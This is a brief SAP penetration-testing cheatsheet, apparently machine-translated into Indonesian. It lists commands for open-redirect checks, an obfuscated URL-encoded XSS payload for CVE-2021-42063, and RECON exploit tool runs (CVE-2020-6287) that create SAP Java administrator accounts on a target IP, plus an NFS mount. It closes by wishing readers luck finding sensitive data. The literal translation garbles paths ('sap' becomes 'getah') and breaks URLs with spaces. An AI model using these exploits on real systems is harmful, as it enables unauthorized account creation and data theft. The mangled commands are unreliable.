SAP Pentest Cheatsheet

Bismillah

Untuk melakukan Pentest, Anda harus menggunakan sistem SAP di jaringan Anda

1. Buka Pemeriksaan Pengalihan

https: // host/getah/publik/bc/icf/logoff? redirecturl = maliciousurl

2. Periksa Protokol Tanpa Jamin (HTTP)

http: // host: port/startpage

http: // host: port/getah/publik/info

3. Pemeriksaan kesalahan konfigurasi informasi sistem

http: // host: port/getah/publik/info

4. XSS (CVE-2021-42063)

Cari/SapirexThelp https: // localhost/sapirexthelp

https: // host/sapirexthelp/acak/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31 %30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36 %33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26 %23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e.asp

5. Sistem Informasi SAP 1.0 Shell Unggah

6. CVE-2022-22536 (ICMAD SAP)

7. Kerentanan SAP Recon (CVE-2020-6287, CVE-2020-6286)

https://github.com/chipik/sap_recon

Unduh file zip

Python Recon.py -H 172.16.30.8 -F /1111.zip

Buat Pengguna SAP Java

Python Recon.py -H 172.16.30.8 -U

Buat Pengguna Administrator SAP Java

Python Recon.py -H 172.16.30.8 -a

1. Pemeriksaan Kerentanan SSL

sslscan

2. NFS Mount

NFS-LS NFS: // Host/Mount

mkdir mnt && mount -t nfs host:/mount ./mnt

Semoga berhasil mencari informasi sensitif

Saya mencari mesin atau wadah Virtual SAP untuk melakukan simulasi pentest, jika Anda memiliki info, mohon dm saya @linkedin)

Berbagi itu peduli

كماقال صلى الله عليه وسلم: "خير الناس أنفعهم للناس"